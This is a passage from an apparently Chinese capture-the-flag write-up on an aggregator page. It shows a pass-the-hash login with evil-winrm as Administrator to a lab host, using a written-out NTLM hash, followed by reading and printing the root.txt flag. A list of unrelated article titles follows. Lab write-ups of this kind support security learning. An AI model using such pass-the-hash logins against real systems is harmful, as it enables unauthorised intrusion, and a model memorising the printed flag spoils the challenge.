└─# evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator

成功登录administrator用户,切换到桌面目录,发现root.txt

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         12/7/2024  12:20 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
733c7927dc034b6e5562e66f7c8b39e5

http://www.kler.cn/a/524864.html

相关文章:

  • ODP(OBProxy)路由初探
  • Charles 4.6.7 浏览器网络调试指南:流量过滤与分析(六)
  • pytorch线性回归模型预测房价例子
  • matlab提取滚动轴承故障特征
  • 【Healpix】python一种用于将球面划分为均匀区域的技术
  • 不只是mini-react第二节:实现最简fiber
  • hunyuan 混元学习
  • Codeforces Round 990 (Div. 2) 题解 A ~ D
  • PySalsa:灵活强大的Python库,专为网络数据分析设计
  • 租车骑绿岛
  • 【解决方案】VMware虚拟机adb连接宿主机夜神模拟器
  • 006 LocalStorage和SessionStorage
  • 1.五子棋对弈python解法——2024年省赛蓝桥杯真题
  • 春晚舞台上的人形机器人:科技与文化的奇妙融合
  • Elasticsearch有哪些应用场景?
  • P4681 [THUSC 2015] 平方运算 Solution
  • 2025_1_29 C语言学习中关于指针
  • 前端拖拽相关功能详解,一篇文章总结前端关于拖拽的应用场景和实现方式(含源码)
  • 【AI论文】Omni-RGPT:通过标记令牌统一图像和视频的区域级理解
  • 单机伪分布Hadoop详细配置
  • 萌新学 Python 之数值处理函数 round 四舍五入、abs 绝对值、pow 幂次方、divmod 元组商和余数
  • 利用飞书机器人进行 - ArXiv自动化检索推荐
  • Java基础知识总结(二十六)--Arrays
  • SpringBoot中@Valid与@Validated使用场景详解
  • 生成模型:扩散模型(DDPM, DDIM, 条件生成)
  • 2025年01月29日Github流行趋势